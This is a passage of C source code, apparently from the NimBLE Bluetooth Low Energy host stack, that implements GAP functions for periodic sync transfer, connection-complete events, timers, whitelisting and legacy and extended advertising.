BLE_GAP_EVENT_PERIODIC_SYNC_LOST; event.periodic_sync_lost.sync_handle = psync->sync_handle; event.periodic_sync_lost.reason = BLE_HS_ETIMEOUT; /* remove any sync_lost event from queue */ ble_npl_eventq_remove(ble_hs_evq_get(), &psync->lost_ev); /* Free the memory occupied by psync as it is no longer needed */ ble_hs_periodic_sync_free(psync); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } #endif #if MYNEWT_VAL(BLE_PERIODIC_ADV_SYNC_TRANSFER) static int periodic_adv_transfer_disable(uint16_t conn_handle) { struct ble_hci_le_periodic_adv_sync_transfer_params_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_params_rp rsp; uint16_t opcode; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER_PARAMS); cmd.conn_handle = htole16(conn_handle); cmd.sync_cte_type = 0x00; cmd.mode = 0x00; cmd.skip = 0x0000; cmd.sync_timeout = 0x000a; rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } return rc; } void ble_gap_rx_periodic_adv_sync_transfer(const struct ble_hci_ev_le_subev_periodic_adv_sync_transfer *ev) { struct ble_hci_le_periodic_adv_term_sync_cp cmd_term; struct ble_gap_event event; struct ble_hs_conn *conn; ble_gap_event_fn *cb; uint16_t sync_handle; uint16_t conn_handle; uint16_t opcode; void *cb_arg; conn_handle = le16toh(ev->conn_handle); ble_hs_lock(); /* Unfortunately spec sucks here as it doesn't explicitly stop * transfer reception on first transfer... for now just disable it on * every transfer event we get. */ periodic_adv_transfer_disable(conn_handle); conn = ble_hs_conn_find(le16toh(ev->conn_handle)); if (!conn || !conn->psync) { /* terminate sync if we didn't expect it */ if (!ev->status) { opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_TERM_SYNC); cmd_term.sync_handle = ev->sync_handle; ble_hs_hci_cmd_tx(opcode, &cmd_term, sizeof(cmd_term), NULL, 0); } ble_hs_unlock(); return; } cb = conn->psync->cb; cb_arg = conn->psync->cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_TRANSFER; event.periodic_transfer.status = ev->status; /* only sync handle is not valid on error */ if (ev->status) { sync_handle = 0; ble_hs_periodic_sync_free(conn->psync); } else { sync_handle = le16toh(ev->sync_handle); conn->psync->sync_handle = sync_handle; conn->psync->adv_sid = ev->sid; memcpy(conn->psync->advertiser_addr.val, ev->peer_addr, 6); conn->psync->advertiser_addr.type = ev->peer_addr_type; ble_hs_periodic_sync_insert(conn->psync); } conn->psync = NULL; event.periodic_transfer.sync_handle = sync_handle; event.periodic_transfer.conn_handle = conn_handle; event.periodic_transfer.service_data = le16toh(ev->service_data); event.periodic_transfer.sid = ev->sid; memcpy(event.periodic_transfer.adv_addr.val, ev->peer_addr, 6); event.periodic_transfer.adv_addr.type = ev->peer_addr_type; event.periodic_transfer.adv_phy = ev->phy; event.periodic_transfer.per_adv_itvl = le16toh(ev->interval); event.periodic_transfer.adv_clk_accuracy = ev->aca; ble_hs_unlock(); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } #endif #if NIMBLE_BLE_CONNECT static int ble_gap_rd_rem_sup_feat_tx(uint16_t handle) { struct ble_hci_le_rd_rem_feat_cp cmd; cmd.conn_handle = htole16(handle); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_REM_FEAT), &cmd, sizeof(cmd), NULL, 0); } #endif /** * Processes an incoming connection-complete HCI event. * instance parameter is valid only for slave connection. */ int ble_gap_rx_conn_complete(struct ble_gap_conn_complete *evt, uint8_t instance) { #if NIMBLE_BLE_CONNECT struct ble_gap_event event; struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, rx_conn_complete); /* in that case *only* status field is valid so we determine role * based on error code */ if (evt->status != BLE_ERR_SUCCESS) { switch (evt->status) { case BLE_ERR_DIR_ADV_TMO: /* slave role (HD directed advertising) * * with ext advertising this is send from set terminated event */ #if !MYNEWT_VAL(BLE_EXT_ADV) if (ble_gap_adv_active()) { ble_gap_adv_finished(0, 0, 0, 0); } #endif break; case BLE_ERR_UNK_CONN_ID: /* master role */ if (ble_gap_master_in_progress()) { /* Connect procedure successfully cancelled. */ if (ble_gap_master.preempted_op == BLE_GAP_OP_M_CONN) { ble_gap_master_failed(BLE_HS_EPREEMPTED); } else { ble_gap_master_connect_cancelled(); } } break; default: /* this should never happen, unless controller is broken */ BLE_HS_LOG(INFO, "controller reported invalid error code in conn" "complete event: %u", evt->status); assert(0); break; } return 0; } /* Apply the event to the existing connection if it exists. */ if (ble_hs_atomic_conn_flags(evt->connection_handle, NULL) == 0) { /* XXX: Does this ever happen? */ return 0; } /* This event refers to a new connection. */ switch (evt->role) { case BLE_HCI_LE_CONN_COMPLETE_ROLE_MASTER: rc = ble_gap_accept_master_conn(); if (rc != 0) { return rc; } break; case BLE_HCI_LE_CONN_COMPLETE_ROLE_SLAVE: rc = ble_gap_accept_slave_conn(instance); if (rc != 0) { return rc; } break; default: BLE_HS_DBG_ASSERT(0); break; } /* We verified that there is a free connection when the procedure began. */ conn = ble_hs_conn_alloc(evt->connection_handle); BLE_HS_DBG_ASSERT(conn != NULL); conn->bhc_itvl = evt->conn_itvl; conn->bhc_latency = evt->conn_latency; conn->bhc_supervision_timeout = evt->supervision_timeout; conn->bhc_master_clock_accuracy = evt->master_clk_acc; if (evt->role == BLE_HCI_LE_CONN_COMPLETE_ROLE_MASTER) { conn->bhc_cb = ble_gap_master.cb; conn->bhc_cb_arg = ble_gap_master.cb_arg; conn->bhc_flags |= BLE_HS_CONN_F_MASTER; conn->bhc_our_addr_type = ble_gap_master.conn.our_addr_type; ble_gap_master_reset_state(); } else { conn->bhc_cb = ble_gap_slave[instance].cb; conn->bhc_cb_arg = ble_gap_slave[instance].cb_arg; conn->bhc_our_addr_type = ble_gap_slave[instance].our_addr_type; #if MYNEWT_VAL(BLE_EXT_ADV) memcpy(conn->bhc_our_rnd_addr, ble_gap_slave[instance].rnd_addr, 6); #endif ble_gap_slave_reset_state(instance); } conn->bhc_peer_addr.type = evt->peer_addr_type; memcpy(conn->bhc_peer_addr.val, evt->peer_addr, 6); conn->bhc_our_rpa_addr.type = BLE_ADDR_RANDOM; memcpy(conn->bhc_our_rpa_addr.val, evt->local_rpa, 6); /* If peer RPA is not set in the event and peer address * is RPA then store the peer RPA address so when the peer * address is resolved, the RPA is not forgotten. */ if (memcmp(BLE_ADDR_ANY->val, evt->peer_rpa, 6) == 0) { if (BLE_ADDR_IS_RPA(&conn->bhc_peer_addr)) { conn->bhc_peer_rpa_addr = conn->bhc_peer_addr; } } else { conn->bhc_peer_rpa_addr.type = BLE_ADDR_RANDOM; memcpy(conn->bhc_peer_rpa_addr.val, evt->peer_rpa, 6); } ble_hs_lock(); memset(&event, 0, sizeof event); ble_hs_conn_insert(conn); ble_hs_unlock(); event.type = BLE_GAP_EVENT_CONNECT; event.connect.conn_handle = evt->connection_handle; event.connect.status = 0; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, evt->connection_handle); ble_gap_rd_rem_sup_feat_tx(evt->connection_handle); return 0; #else return BLE_HS_ENOTSUP; #endif } void ble_gap_rx_rd_rem_sup_feat_complete(const struct ble_hci_ev_le_subev_rd_rem_used_feat *ev) { #if NIMBLE_BLE_CONNECT struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(le16toh(ev->conn_handle)); if ((conn != NULL) && (ev->status == 0)) { conn->supported_feat = get_le32(ev->features); } ble_hs_unlock(); #endif } int ble_gap_rx_l2cap_update_req(uint16_t conn_handle, struct ble_gap_upd_params *params) { struct ble_gap_event event; int rc; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_L2CAP_UPDATE_REQ; event.conn_update_req.conn_handle = conn_handle; event.conn_update_req.peer_params = params; rc = ble_gap_call_conn_event_cb(&event, conn_handle); return rc; } void ble_gap_rx_phy_update_complete(const struct ble_hci_ev_le_subev_phy_update_complete *ev) { struct ble_gap_event event; uint16_t conn_handle = le16toh(ev->conn_handle); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PHY_UPDATE_COMPLETE; event.phy_updated.status = ev->status; event.phy_updated.conn_handle = conn_handle; event.phy_updated.tx_phy = ev->tx_phy; event.phy_updated.rx_phy = ev->rx_phy; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } static int32_t ble_gap_master_timer(void) { uint32_t ticks_until_exp; int rc; ticks_until_exp = ble_gap_master_ticks_until_exp(); if (ticks_until_exp != 0) { /* Timer not expired yet. */ return ticks_until_exp; } /*** Timer expired; process event. */ switch (ble_gap_master.op) { case BLE_GAP_OP_M_CONN: rc = ble_gap_conn_cancel_tx(); if (rc != 0) { /* Failed to stop connecting; try again in 100 ms. */ return ble_npl_time_ms_to_ticks32(BLE_GAP_CANCEL_RETRY_TIMEOUT_MS); } else { /* Stop the timer now that the cancel command has been acked. */ ble_gap_master.exp_set = 0; /* Timeout gets reported when we receive a connection complete * event indicating the connect procedure has been cancelled. */ /* XXX: Set a timer to reset the controller if a connection * complete event isn't received within a reasonable interval. */ } break; case BLE_GAP_OP_M_DISC: #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) /* When a discovery procedure times out, it is not a failure. */ rc = ble_gap_disc_enable_tx(0, 0); if (rc != 0) { /* Failed to stop discovery; try again in 100 ms. */ return ble_npl_time_ms_to_ticks32(BLE_GAP_CANCEL_RETRY_TIMEOUT_MS); } ble_gap_disc_complete(); #else assert(0); #endif break; default: BLE_HS_DBG_ASSERT(0); break; } return BLE_HS_FOREVER; } #if !MYNEWT_VAL(BLE_EXT_ADV) static int32_t ble_gap_slave_timer(void) { uint32_t ticks_until_exp; int rc; ticks_until_exp = ble_gap_slave_ticks_until_exp(); if (ticks_until_exp != 0) { /* Timer not expired yet. */ return ticks_until_exp; } /*** Timer expired; process event. */ /* Stop advertising. */ rc = ble_gap_adv_enable_tx(0); if (rc != 0) { /* Failed to stop advertising; try again in 100 ms. */ return 100; } /* Clear the timer and cancel the current procedure. */ ble_gap_slave_reset_state(0); /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(0, BLE_HS_ETIMEOUT, 0, 0); return BLE_HS_FOREVER; } #endif static int32_t ble_gap_update_timer(void) { struct ble_gap_update_entry *entry; int32_t ticks_until_exp; uint16_t conn_handle; do { ble_hs_lock(); conn_handle = ble_gap_update_next_exp(&ticks_until_exp); if (ticks_until_exp == 0) { entry = ble_gap_update_entry_remove(conn_handle); } else { entry = NULL; } ble_hs_unlock(); if (entry != NULL) { ble_gap_update_entry_free(entry); } } while (entry != NULL); return ticks_until_exp; } int ble_gap_set_event_cb(uint16_t conn_handle, ble_gap_event_fn *cb, void *cb_arg) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { conn->bhc_cb = cb; conn->bhc_cb_arg = cb_arg; } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } return 0; } /** * Handles timed-out GAP procedures. * * @return The number of ticks until this function should * be called again. */ int32_t ble_gap_timer(void) { int32_t update_ticks; int32_t master_ticks; int32_t min_ticks; master_ticks = ble_gap_master_timer(); update_ticks = ble_gap_update_timer(); min_ticks = min(master_ticks, update_ticks); #if !MYNEWT_VAL(BLE_EXT_ADV) min_ticks = min(min_ticks, ble_gap_slave_timer()); #endif return min_ticks; } /***************************************************************************** * $white list * *****************************************************************************/ #if MYNEWT_VAL(BLE_WHITELIST) static int ble_gap_wl_busy(void) { /* Check if an auto or selective connection establishment procedure is in * progress. */ return ble_gap_master.op == BLE_GAP_OP_M_CONN && ble_gap_master.conn.using_wl; } static int ble_gap_wl_tx_add(const ble_addr_t *addr) { struct ble_hci_le_add_whte_list_cp cmd; if (addr->type > BLE_ADDR_RANDOM) { return BLE_HS_EINVAL; } memcpy(cmd.addr, addr->val, BLE_DEV_ADDR_LEN); cmd.addr_type = addr->type; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_ADD_WHITE_LIST), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_wl_tx_clear(void) { return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_WHITE_LIST), NULL, 0, NULL, 0 ); } #endif int ble_gap_wl_set(const ble_addr_t *addrs, uint8_t white_list_count) { #if MYNEWT_VAL(BLE_WHITELIST) int rc; int i; STATS_INC(ble_gap_stats, wl_set); ble_hs_lock(); if (white_list_count == 0) { rc = BLE_HS_EINVAL; goto done; } for (i = 0; i < white_list_count; i++) { if (addrs[i].type != BLE_ADDR_PUBLIC && addrs[i].type != BLE_ADDR_RANDOM) { rc = BLE_HS_EINVAL; goto done; } } if (ble_gap_wl_busy()) { rc = BLE_HS_EBUSY; goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: set whitelist; "); ble_gap_log_wl(addrs, white_list_count); BLE_HS_LOG(INFO, "\n"); rc = ble_gap_wl_tx_clear(); if (rc != 0) { goto done; } for (i = 0; i < white_list_count; i++) { rc = ble_gap_wl_tx_add(addrs + i); if (rc != 0) { goto done; } } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, wl_set_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $stop advertise * *****************************************************************************/ #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_enable_tx(int enable) { struct ble_hci_le_set_adv_enable_cp cmd; cmd.enable = !!enable; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_ENABLE), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_adv_stop_no_lock(void) { bool active; int rc; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); STATS_INC(ble_gap_stats, adv_stop); active = ble_gap_adv_active(); BLE_HS_LOG(INFO, "GAP procedure initiated: stop advertising.\n"); rc = ble_gap_adv_enable_tx(0); if (rc != 0) { goto done; } ble_gap_slave_reset_state(0); if (!active) { rc = BLE_HS_EALREADY; } else { rc = 0; } done: if (rc != 0) { STATS_INC(ble_gap_stats, adv_stop_fail); } return rc; } #endif int ble_gap_adv_stop(void) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) int rc; ble_hs_lock(); rc = ble_gap_adv_stop_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $advertise * *****************************************************************************/ #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_type(const struct ble_gap_adv_params *adv_params) { switch (adv_params->conn_mode) { case BLE_GAP_CONN_MODE_NON: if (adv_params->disc_mode == BLE_GAP_DISC_MODE_NON) { return BLE_HCI_ADV_TYPE_ADV_NONCONN_IND; } else { return BLE_HCI_ADV_TYPE_ADV_SCAN_IND; } case BLE_GAP_CONN_MODE_UND: return BLE_HCI_ADV_TYPE_ADV_IND; case BLE_GAP_CONN_MODE_DIR: if (adv_params->high_duty_cycle) { return BLE_HCI_ADV_TYPE_ADV_DIRECT_IND_HD; } else { return BLE_HCI_ADV_TYPE_ADV_DIRECT_IND_LD; } default: BLE_HS_DBG_ASSERT(0); return BLE_HCI_ADV_TYPE_ADV_IND; } } static void ble_gap_adv_dflt_itvls(uint8_t conn_mode, uint16_t *out_itvl_min, uint16_t *out_itvl_max) { switch (conn_mode) { case BLE_GAP_CONN_MODE_NON: *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL2_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL2_MAX; break; case BLE_GAP_CONN_MODE_UND: *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; case BLE_GAP_CONN_MODE_DIR: *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; default: BLE_HS_DBG_ASSERT(0); *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; } } static int ble_gap_adv_params_tx(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_adv_params *adv_params) { const ble_addr_t *peer_any = BLE_ADDR_ANY; struct ble_hci_le_set_adv_params_cp cmd; uint16_t opcode; uint16_t min; uint16_t max; /* Fill optional fields if application did not specify them. */ if ((adv_params->itvl_min == 0) && (adv_params->itvl_max == 0)) { ble_gap_adv_dflt_itvls(adv_params->conn_mode, &min, &max); cmd.min_interval = htole16(min); cmd.max_interval = htole16(max); } else { cmd.min_interval = htole16(adv_params->itvl_min); cmd.max_interval = htole16(adv_params->itvl_max); } cmd.type = ble_gap_adv_type(adv_params); cmd.own_addr_type = own_addr_type; if (peer_addr == NULL) { peer_addr = peer_any; } cmd.peer_addr_type = peer_addr->type; memcpy(&cmd.peer_addr, peer_addr->val, sizeof(cmd.peer_addr)); if (adv_params->channel_map == 0) { cmd.chan_map = BLE_GAP_ADV_DFLT_CHANNEL_MAP; } else { cmd.chan_map = adv_params->channel_map; } /* Zero is the default value for filter policy and high duty cycle */ cmd.filter_policy = adv_params->filter_policy; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_PARAMS); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_adv_validate(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_adv_params *adv_params) { if (adv_params == NULL) { return BLE_HS_EINVAL; } if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } if (adv_params->disc_mode >= BLE_GAP_DISC_MODE_MAX) { return BLE_HS_EINVAL; } if (ble_gap_slave[0].op != BLE_GAP_OP_NULL) { return BLE_HS_EALREADY; } switch (adv_params->conn_mode) { case BLE_GAP_CONN_MODE_NON: /* High duty cycle only allowed for directed advertising. */ if (adv_params->high_duty_cycle) { return BLE_HS_EINVAL; } break; case BLE_GAP_CONN_MODE_UND: /* High duty cycle only allowed for directed advertising. */ if (adv_params->high_duty_cycle) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. */ if (!ble_hs_conn_can_alloc()) { return BLE_HS_ENOMEM; } break; case BLE_GAP_CONN_MODE_DIR: if (peer_addr == NULL) { return BLE_HS_EINVAL; } if (peer_addr->type != BLE_ADDR_PUBLIC && peer_addr->type != BLE_ADDR_RANDOM && peer_addr->type != BLE_ADDR_PUBLIC_ID && peer_addr->type != BLE_ADDR_RANDOM_ID) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. */ if (!ble_hs_conn_can_alloc()) { return BLE_HS_ENOMEM; } break; default: return BLE_HS_EINVAL; } return 0; } #endif int ble_gap_adv_start(uint8_t own_addr_type, const ble_addr_t *direct_addr, int32_t duration_ms, const struct ble_gap_adv_params *adv_params, ble_gap_event_fn *cb, void *cb_arg) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint32_t duration_ticks; int rc; STATS_INC(ble_gap_stats, adv_start); ble_hs_lock(); rc = ble_gap_adv_validate(own_addr_type, direct_addr, adv_params); if (rc != 0) { goto done; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } if (!ble_hs_is_enabled()) { rc = BLE_HS_EDISABLED; goto done; } if (ble_gap_is_preempted()) { rc = BLE_HS_EPREEMPTED; goto done; } rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: advertise; "); ble_gap_log_adv(own_addr_type, direct_addr, adv_params); BLE_HS_LOG(INFO, "\n"); ble_gap_slave[0].cb = cb; ble_gap_slave[0].cb_arg = cb_arg; ble_gap_slave[0].our_addr_type = own_addr_type; if (adv_params->conn_mode != BLE_GAP_CONN_MODE_NON) { ble_gap_slave[0].connectable = 1; } else { ble_gap_slave[0].connectable = 0; } rc = ble_gap_adv_params_tx(own_addr_type, direct_addr, adv_params); if (rc != 0) { goto done; } ble_gap_slave[0].op = BLE_GAP_OP_S_ADV; rc = ble_gap_adv_enable_tx(1); if (rc != 0) { ble_gap_slave_reset_state(0); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_slave_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, adv_start_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_set_data(const uint8_t *data, int data_len) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) struct ble_hci_le_set_adv_data_cp cmd; uint16_t opcode; STATS_INC(ble_gap_stats, adv_set_data); /* Check for valid parameters */ if (((data == NULL) && (data_len != 0)) || (data_len > BLE_HCI_MAX_ADV_DATA_LEN)) { return BLE_ERR_INV_HCI_CMD_PARMS; } memcpy(cmd.adv_data, data, data_len); cmd.adv_data_len = data_len; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_DATA); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_rsp_set_data(const uint8_t *data, int data_len) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) struct ble_hci_le_set_scan_rsp_data_cp cmd; uint16_t opcode; /* Check for valid parameters */ if (((data == NULL) && (data_len != 0)) || (data_len > BLE_HCI_MAX_SCAN_RSP_DATA_LEN)) { return BLE_HS_EINVAL; } memcpy(cmd.scan_rsp, data, data_len); cmd.scan_rsp_len = data_len; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_RSP_DATA); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_set_fields(const struct ble_hs_adv_fields *adv_fields) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint8_t buf[BLE_HS_ADV_MAX_SZ]; uint8_t buf_sz; int rc; rc = ble_hs_adv_set_fields(adv_fields, buf, &buf_sz, sizeof buf); if (rc != 0) { return rc; } rc = ble_gap_adv_set_data(buf, buf_sz); if (rc != 0) { return rc; } return 0; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_rsp_set_fields(const struct ble_hs_adv_fields *rsp_fields) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint8_t buf[BLE_HS_ADV_MAX_SZ]; uint8_t buf_sz; int rc; rc = ble_hs_adv_set_fields(rsp_fields, buf, &buf_sz, sizeof buf); if (rc != 0) { return rc; } rc = ble_gap_adv_rsp_set_data(buf, buf_sz); if (rc != 0) { return rc; } return 0; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_active(void) { return ble_gap_adv_active_instance(0); } #if MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_ext_adv_params_tx(uint8_t instance, const struct ble_gap_ext_adv_params *params, int8_t *selected_tx_power) { struct ble_hci_le_set_ext_adv_params_cp cmd; struct ble_hci_le_set_ext_adv_params_rp rsp; int rc; memset(&cmd, 0, sizeof(cmd)); cmd.adv_handle = instance; if (params->connectable) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_CONNECTABLE; } if (params->scannable) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_SCANNABLE; } if (params->directed) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_DIRECTED; cmd.peer_addr_type = params->peer.type; memcpy(cmd.peer_addr, params->peer.val, BLE_DEV_ADDR_LEN); } if (params->high_duty_directed) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_HD_DIRECTED; } if (params->legacy_pdu) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_LEGACY; } if (params->anonymous) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_ANON_ADV; } if (params->include_tx_power) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_INC_TX_PWR; } /* Fill optional fields if application did not specify them. */ if (params->itvl_min == 0 && params->itvl_max == 0) { /* TODO for now limited to legacy values*/ put_le24(cmd.pri_itvl_min, BLE_GAP_ADV_FAST_INTERVAL1_MIN); put_le24(cmd.pri_itvl_max, BLE_GAP_ADV_FAST_INTERVAL2_MAX); } else { put_le24(cmd.pri_itvl_min, params->itvl_min); put_le24(cmd.pri_itvl_max, params->itvl_max); } if (params->channel_map == 0) { cmd.pri_chan_map = BLE_GAP_ADV_DFLT_CHANNEL_MAP; } else { cmd.pri_chan_map = params->channel_map; } /* Zero is the default value for filter policy and high duty cycle */ cmd.filter_policy = params->filter_policy; cmd.tx_power = params->tx_power; if (params->legacy_pdu) { cmd.pri_phy = BLE_HCI_LE_PHY_1M; cmd.sec_phy = BLE_HCI_LE_PHY_1M; } else { cmd.pri_phy = params->primary_phy; cmd.sec_phy = params->secondary_phy; } cmd.own_addr_type = params->own_addr_type; cmd.sec_max_skip = 0; cmd.sid = params->sid; cmd.scan_req_notif = params->scan_req_notif; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_PARAM), &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (rc != 0) { return rc; } if (selected_tx_power) { *selected_tx_power = rsp.tx_power; } return 0; } static int ble_gap_ext_adv_params_validate(const struct ble_gap_ext_adv_params *params) { if (!params) { return BLE_HS_EINVAL; } if (params->own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. */ if (params->connectable && !ble_hs_conn_can_alloc()) { return BLE_HS_ENOMEM; } if (params->legacy_pdu) { /* not allowed for legacy PDUs */ if (params->anonymous || params->include_tx_power) { return BLE_HS_EINVAL; } } if (params->directed) { if (params->scannable && params->connectable) { return BLE_HS_EINVAL; } } if (!params->legacy_pdu) { /* not allowed for extended advertising PDUs */ if (params->connectable && params->scannable) { return BLE_HS_EINVAL; } /* HD directed advertising allowed only for legacy PDUs */ if (params->high_duty_directed) { return BLE_HS_EINVAL; } } return 0; } int ble_gap_ext_adv_configure(uint8_t instance, const struct ble_gap_ext_adv_params *params, int8_t *selected_tx_power, ble_gap_event_fn *cb, void *cb_arg) { int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } rc = ble_gap_ext_adv_params_validate(params); if (rc) { return rc; } ble_hs_lock(); if (ble_gap_adv_active_instance(instance)) { ble_hs_unlock(); return BLE_HS_EBUSY; } rc = ble_gap_ext_adv_params_tx(instance, params, selected_tx_power); if (rc) { ble_hs_unlock(); return rc; } ble_gap_slave[instance].configured = 1; ble_gap_slave[instance].cb = cb; ble_gap_slave[instance].cb_arg = cb_arg; ble_gap_slave[instance].our_addr_type = params->own_addr_type; ble_gap_slave[instance].connectable = params->connectable; ble_gap_slave[instance].scannable = params->scannable; ble_gap_slave[instance].directed = params->directed; ble_gap_slave[instance].high_duty_directed = params->high_duty_directed; ble_gap_slave[instance].legacy_pdu = params->legacy_pdu; ble_hs_unlock(); return 0; } static int ble_gap_ext_adv_set_addr_no_lock(uint8_t instance, const uint8_t *addr) { struct ble_hci_le_set_adv_set_rnd_addr_cp cmd; int rc; cmd.adv_handle = instance; memcpy(cmd.addr, addr, BLE_DEV_ADDR_LEN); rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_SET_RND_ADDR), &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { return rc; } ble_gap_slave[instance].rnd_addr_set = 1; memcpy(ble_gap_slave[instance].rnd_addr, addr, 6); return 0; } int ble_gap_ext_adv_set_addr(uint8_t instance, const ble_addr_t *addr) { int rc; if (instance >= BLE_ADV_INSTANCES || addr->type != BLE_ADDR_RANDOM) { return BLE_HS_EINVAL; } ble_hs_lock(); rc = ble_gap_ext_adv_set_addr_no_lock(instance, addr->val); ble_hs_unlock(); return rc; } int ble_gap_ext_adv_start(uint8_t instance, int duration, int max_events) { struct ble_hci_le_set_ext_adv_enable_cp *cmd; uint8_t buf[sizeof(*cmd) + sizeof(cmd->sets[0])]; const uint8_t *rnd_addr; uint16_t opcode; int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); if (!ble_gap_slave[instance].configured) { ble_hs_unlock(); return BLE_HS_EINVAL; } if (ble_gap_slave[instance].op != BLE_GAP_OP_NULL) { ble_hs_unlock(); return BLE_HS_EALREADY; } /* HD directed duration shall not be 0 or larger than >1.28s */ if (ble_gap_slave[instance].high_duty_directed && ((duration == 0) || (duration > 128)) ) { ble_hs_unlock(); return BLE_HS_EINVAL; } /* verify own address type if random address for instance wasn't explicitly * set 